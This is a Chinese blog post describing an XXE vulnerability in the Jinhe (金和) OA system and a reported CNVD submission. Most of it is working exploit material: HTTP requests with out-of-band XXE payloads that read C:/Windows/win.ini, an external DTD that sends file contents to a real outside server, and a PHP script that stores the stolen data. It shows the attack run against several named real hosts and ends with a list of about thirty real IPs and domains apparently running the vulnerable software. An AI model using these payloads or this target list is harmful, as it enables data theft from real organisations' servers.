金和OA系统XXE漏洞深度解析(CNVD已收录)

金和OA XXE漏洞

漏洞路由

POST /c6/JHSoft.Web.Roles/GetAdminData.aspx/? HTTP/1.1

漏洞描述

金和OA存在xxe漏洞

电鳗岛

漏洞状态:

已提交cnvd平台,但疑似与CNVD-2024-44962重复,目前正在重新测试,并复现

xxe.dtd内容如下

<!ENTITY % all “<!ENTITY send SYSTEM ‘http://121.36.192.150:8072/get.php?file=%file;’>”>

金和OA系统XXE漏洞深度解析(CNVD已收录)

在服务器121.36.192.150:8072/目录下创建get.php文件

文件内容为

<?php

$data=$_GET[‘file’];

$myfile = fopen(“file.txt”, “w+”);

fwrite($myfile, $data);

fclose($myfile);

?>

金和OA系统XXE漏洞深度解析(CNVD已收录)

整体流程为poc为个人服务器执行dtd与读取目标服务器的c盘文件内容

Dtd内容是XXE无回显利用方式,将内容外带到其他地方,将内容通过get.php写入file.txt

详细文章:https://blog.csdn.net/qq_61553520/article/details/137085344

快速验证存在漏洞方式

POST /c6/JHSoft.Web.Roles/GetAdminData.aspx/? HTTP/1.1

Host: 61.133.99.56:88

User-Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95

Accept-Encoding: gzip, deflate

Accept: */*

Connection: close

Content-Type: application/Xml

Content-Length: 92

<!DOCTYPE root [ <!ENTITY % remote SYSTEM “http://47.109.20.177:8001/test.xml”> %remote;]>

金和OA系统XXE漏洞深度解析(CNVD已收录)

下面是读取文件

POST /c6/JHSoft.Web.Roles/GetAdminData.aspx/? HTTP/1.1

Host: 61.133.99.56:88

User-Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95

Accept-Encoding: gzip, deflate

Accept: */*

Connection: close

Content-Type: application/Xml

Content-Length: 198

<?xml version=”1.0″?>

<!DOCTYPE ANY[

<!ENTITY % file SYSTEM “file:///C:/Windows/win.ini”>

<!ENTITY % remote SYSTEM “http://47.109.20.177:8001/xxe.dtd”>

%remote;

%all;

]>

<root>&send;</root>

金和OA系统XXE漏洞深度解析(CNVD已收录)

Http://121.36.192.150:8072/file.txt

金和OA系统XXE漏洞深度解析(CNVD已收录)

服务器收到请求

http://61.133.99.56:88

漏洞复现一

POST /c6/JHSoft.Web.Roles/GetAdminData.aspx/? HTTP/1.1

Host: 61.133.99.56:88

User-Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95

Accept-Encoding: gzip, deflate

Accept: */*

Connection: close

Content-Type: application/Xml

Content-Length: 92

<!DOCTYPE root [ <!ENTITY % remote SYSTEM “http://47.109.20.177:8001/test.xml”> %remote;]>

金和OA系统XXE漏洞深度解析(CNVD已收录)

漏洞复现 二

http://123.56.162.103:88

POST /c6/JHSoft.Web.Roles/GetAdminData.aspx/? HTTP/1.1

Host: 123.56.162.103:88

User-Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95

Accept-Encoding: gzip, deflate

Accept: */*

Connection: close

Content-Type: application/Xml

Content-Length: 92

<!DOCTYPE root [ <!ENTITY % remote SYSTEM “http://47.109.20.177:8001/test.xml”> %remote;]>

金和OA系统XXE漏洞深度解析(CNVD已收录)

漏洞复现三

http://123.233.249.254

POST /c6/JHSoft.Web.Roles/GetAdminData.aspx/? HTTP/1.1

Host: 123.233.249.254

User-Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95

Accept-Encoding: gzip, deflate

Accept: */*

Connection: close

Content-Type: application/Xml

Content-Length: 92

<!DOCTYPE root [ <!ENTITY % remote SYSTEM “http://47.109.20.177:8001/test.xml”> %remote;]>

金和OA系统XXE漏洞深度解析(CNVD已收录)

其余IP地址:

http://221.1.82.114:8088

http://oa.sdepi.com

http://eoa.sdepi.com

http://112.253.1.71:88

http://124.65.187.218:1800

http://123.233.249.254

http://it.changdajianke.com:8088

http://www.mediacone.cn

http://211.149.243.182

http://123.56.162.103:88

http://119.3.191.73

http://218.56.174.84

http://oazhongbaony.com:8081

http://222.174.117.45:82

http://oa.chinakingho.com

http://60.171.237.176

http://123.56.162.103:88

http://www.oazhongbaony.com:8081

http://60.171.237.176:81

http://tq.huaihaizzy.com:81

http://117.78.6.255

http://118.122.122.195:9088

http://61.133.99.56:88

http://ahznhg.qyznwly.com:8088

http://zjy.genesclouds.com.cn:88

http://183.242.18.158:8081

http://123.57.26.236

http://222.174.117.44

http://www.oazhongbaony.com:8081

http://115.231.60.102:8666

http://222.212.88.47:91

 

给TA打赏
共{{data.count}}人
人已打赏
未分类

2025年派小星DNS二级域名分发系统免费公测版源码

2025-5-15 17:08:18

未分类

金和OA系统XXE漏洞深度解析(CNVD已收录)

2025-5-15 17:08:24

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索